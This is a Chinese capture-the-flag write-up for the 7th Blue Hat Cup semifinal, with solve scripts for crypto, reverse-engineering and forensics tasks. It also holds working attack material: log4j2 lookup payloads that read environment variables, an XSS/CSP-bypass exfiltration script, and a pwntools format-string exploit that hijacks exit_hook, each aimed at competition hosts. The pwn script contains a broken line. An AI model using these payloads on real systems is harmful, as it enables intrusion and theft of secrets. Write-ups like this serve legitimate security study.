第七届蓝帽杯半决赛 | 风尘孤狼
0%

第七届蓝帽杯半决赛

image-20230916232950862

CTF

Crypto

Ezrsa

根据代码已知XY以及密文和n

Exp如下

from libnum import *
import math
import gmpy2
from Crypto.Util.number import inverse

a = 1
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
x = 153801856029563198525204130558738800846256680799373350925981555360388985602786501362501554433635610131437376183630577217917787342621398264625389914280509
y = 8086061902465799210233863613232941060876437002894022994953293934963170056653232109405937694010696299303888742108631749969054117542816358078039478109426

 
b = -(2*y+x+1)
c = -n
ct =  15380535750650959213679345560658190067564859611922563753882617419201718847747207949211621591882732604480600745000879508274349808435529637573773711729853565120321608048340424321537282281161623712479117497156437792084977778826238039385697230676340978078264209760724043776058017336241110097549146883806481148999
d = gmpy2.isqrt(b * b - 4 * c)
d = int(d)
q = (-b+d)/2
p = n/q
d = inverse(65537, q - 1)
x=pow(ct,d,q)
print(n2s(x))
image-20230917184734011

flag{2a5a9c6fe94da5ef7edeffebb506b29a}

MISC

签到题

关注公众号得到flag

flag{Welcome_To_Blue_Hat_Cup}

排队队吃果果

Excel表格里面数字有加粗,根据题目,排队,按列升序之后加粗变黑,修改宽高得到二维码

img

扫码得到flag

flag{35b6f3ed-9d28-93b8-e124-39f8ec3376b2}

Loc4te_P4ssw0rd【复现】

提示:注意题目描述的双关

image-20231220132236534

就这些数据,文件头是7z,应该就是压缩包了,看toto师傅文章发现是用最后的数字当作密码索引

抄过来脚本记录一下,万一又有类似的题目了

with open('attachment.7z', 'rb') as f:
    data = f.read()
    # print(data)
    length = len(data)
    # print(length)
    a = '125 4056 10500 20597 24922 28780 32756 36767 39800 41536 44516 45523'
    result = ''.join(chr(data[int(i) % length]) for i in a.split(' '))
    print(result)

不过跑过来个字符串,但是这个文件就1kb,说是压缩包我感觉是不切合实际的,可能这就是flag?

image-20231220132422667

RE

justamat

sub_476590函数拼接字符串

img

比如输入”abcdefghijklmn”,经过两次sub_476590函数调用

s = "abcdefghijklmn"
ss = "abcdefghijklmn_you_get_it"
sss = "there_are_a_lot_useless_information_but_oh.o0O_abcdefghijklmn_you_get_it"

然后把sss转为10*10的矩阵,传入sub_4051A0

sub_4051A0函数对矩阵做乘法,与已知的结果比较

img

实际上,矩阵乘法的作用相当于X*A=B,其中X包含输入,解出X即可得到flag

import numpy as np
# X*A=B
A = [0xfe, 0xb, 0x1d, 0xf6, 0x83, 0xff, 0xe0, 0xb8, 0xdd, 0xb0, 0xc5, 0xde, 0xf6, 0x14, 0x9f, 0xdd, 0xd9, 0x7, 0x2d, 0x6b, 0x19, 0xca, 0x73, 0xfd, 0x87, 0x72, 0x24, 0x4, 0x49, 0x7e, 0xa9, 0xce, 0x91, 0xbe, 0x41, 0x18, 0x60, 0x3f, 0x2b, 0x63, 0x1c, 0xd2, 0x90, 0xe9, 0x8e, 0xba, 0x1e, 0xf3, 0x41, 0xad,
     0x2c, 0x3, 0x69, 0xda, 0x10, 0xfd, 0xfd, 0xe7, 0x6, 0x36, 0xd6, 0x2, 0x59, 0x18, 0xcc, 0x50, 0x87, 0xaf, 0xfb, 0x18, 0x44, 0x7f, 0xad, 0xf8, 0x2c, 0x67, 0x1d, 0x22, 0x84, 0xac, 0xe, 0x23, 0xdc, 0xe6, 0xbb, 0xd2, 0xb8, 0x4a, 0xbc, 0xde, 0x50, 0x9c, 0x1c, 0x1e, 0x86, 0x3a, 0x2d, 0xdd, 0xc3, 0x3]
B = [0x1c633, 0x1df94, 0x20ebf, 0x2ba40, 0x1e884, 0x260d1, 0x1f9b1, 0x1ea1a, 0x1eeaa, 0x1dfb2, 0x1c1d0, 0x1eef2, 0x216e1, 0x2be00, 0x1fb5e, 0x25d74, 0x1f000, 0x202d6, 0x20002, 0x1ddfe, 0x1c017, 0x1f08c, 0x227f6, 0x2c7ba, 0x201ae, 0x27fbf, 0x20e21, 0x1ff5c, 0x1fd62, 0x1e948, 0x1be6e, 0x1f4d7, 0x22c8d, 0x2c353, 0x1f8db, 0x26e1d, 0x1ff61, 0x1ea0f, 0x1f0d6, 0x1eda8, 0x1ad7d, 0x18218, 0x1ccd4, 0x239b6, 0x1ac4c, 0x20d7c, 0x1d967, 0x1a4f4, 0x1cad8, 0x196ae,
     0x1831b, 0x17e45, 0x1d0cf, 0x23edf, 0x181ae, 0x21760, 0x1d3b4, 0x175d6, 0x17d3a, 0x1994f, 0x1189d, 0x14ccf, 0x1568e, 0x17eeb, 0x1327e, 0x16a45, 0x12921, 0x11ff0, 0x13643, 0x11729, 0x15191, 0x17d17, 0x17262, 0x1a863, 0x17010, 0x17b10, 0x14f9c, 0x143e8, 0x15e9b, 0x1242c, 0xf68c, 0x1192a, 0x150ad, 0x1b1a0, 0x14c60, 0x182ab, 0x13f4b, 0x141a6, 0x15aa3, 0x135c9, 0x1d86f, 0x1e8fa, 0x2158d, 0x2bdac, 0x20e4f, 0x27ee6, 0x213b9, 0x20e86, 0x211ff, 0x1e1ef]
A_Mat = []
B_Mat = []
for i in range(0, 100, 10):
    tmp = A[i:i+10]
    A_Mat.append(tmp)
    tmp = B[i:i+10]
    B_Mat.append(tmp)
A_Mat = np.mat(A_Mat)
B_Mat = np.mat(B_Mat)
X_Mat = np.dot(B_Mat, np.linalg.inv(A_Mat))
for i in range(len(X_Mat)):
    tmp = X_Mat[i].tolist()[0]
    for j in range(len(tmp)):
        print(chr(round(tmp[j])), end="")
# there_are_a_lot_useless_information_but_oh.o0O_flag{8f9c6cf7-f362-4a4e-ace2-a34d90939589}_you_get_it

所以flag为flag{8f9c6cf7-f362-4a4e-ace2-a34d90939589}

WEB

MyLinuxBot

根据题目描述,log4j2读环境变量

${java:${env}}

image-20230916233252881

直接读环境变量即可得到flag

${java:${env:FLAG}}

image-20230916233309817

flag{f3f5a58f-f117-40af-a58e-8462b38ea92b}

AirticleShare

这个是21年一个比赛的原题,简单改了一下不过做法没变

https://www.freesion.com/article/3304518786/

每个用户都有独特的id

image-20230917184812217

打XSS获取admin的id之后得到flag,绕过CSP策略

Exp如下

import requests
import time
import sys

host = '112.74.185.213'
port = 46791
s = requests.Session()
base_url = f"http://{host}:{port}//"
res = s.get(base_url)
pos = res.text.find('name="c" value="') + len('name="c" value="')
csrftoken = res.text[pos:pos+16]

ss = "0123456789abcdef"
flag = ""

for i in range(16):
    for j in ss:
        print("trying",j)
        payload = f'''<form data-parsley-validate>
                    <input data-parsley-required
                    data-parsley-trigger=\"blur\"
                    data-parsley-error-message=\"<input type=button id=like>\"
                    data-parsley-errors-container=\"a[href^=\'/lookup.php?id={flag + j}\']\"
                    autofocus>
                    </form>'''
        data = {'c': csrftoken, 'content': payload}
        res = s.post(base_url + "add.php", data=data, allow_redirects=False)
        # print(res.headers)
        location = res.headers['Location']
        pos = location.find('id=') + 3
        wp = location[pos:]
        data = {'c': csrftoken, 'id': wp}
        res = s.post(base_url + "admin.php", data=data)
        time.sleep(3)

        res = s.get(f"http://{host}:{port}/lookup.php?id={wp}")
        txt = res.text.replace("\n", "").replace("\r", "")
        if "Liked by</h3>admin" not in txt:
            flag += j
            print(i,flag)
            break

跑完之后获得admin的id,修改id,访问得到flag

image-20230917184829408

ctf{s1d3_ch4nn3l_attack_is_funny}

Pwn

Admin

非预期,能获取管理员密码

image-20230916233427813

Uaf

审计代码发现格式化字符串漏洞

img

并且能改写一个地址,然后程序就退出,

利用格式化字符串泄露出libc,然后打exit_hook为one_gadget

脚本如下:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('120.78.172.238', 43259)
elf = ELF('./pwn')
libc = ELF('./libc-2.31.so')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

rl(">> \n")
sl(str(5))
rl("Passwd: ")
s(str(1234567890))

rl("Tell me ur name: \n")
#bug()
sl(b'%19$p')
#bug()
libc_base=int(p.recv(14),16)-libc.sym['__libc_start_main']-243
li(hex(libc_base))
exit_hook=libc_base+2020872
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#exit_hook=libc_base+libc.sym['rtld_lock_default_lock_recursive']
one_gadget=libc_base+0xe6c7e
rl(">> \n")
sl(str(2))
li(hex(exit_hook))
rl("WRITE MODE: ")
s(p64(malloc_hook))s
s(p64(one_gadget))

inter()

取证

取证WP

1

检材数据开始提取是今年09-11 17:21

看日志得到答案

img

2

嫌疑人手机SD卡存储空间一共24.32 GB

image-20230916233729511

3

手机名称为sailfish

image-20230916233740525

4

同图三

嫌疑人手机IMEI是352531082716257

5

嫌疑人手机通讯录数据存放在contacts.db

image-20230916233800330

7

测试apk的包名是com.example.myapplication

image-20230916233818644

8

测试apk的签名算法是SHA256withRSA

找到对应测试apk,反编译查看加密算法得到答案

image-20230916233838496

10

测试apk一共申请了3个权限

在线摸瓜工具分析APK得到答案

image-20230916233853323

11

测试apk对Calllog.txt文件内的数据进行了Base64加密

image-20230916233919623

12

10086对嫌疑人拨打过2次电话

image-20230916233934950

14

测试apk对短信记录进行加密的秘钥是bGlqdWJkeWhmdXJp

So文件分析

image-20230916233948880 image-20230916234006928

15

嫌疑人在2021年登录支付宝的验证码是9250

image-20230916234022292
制作不易,如若感觉写的不错,欢迎打赏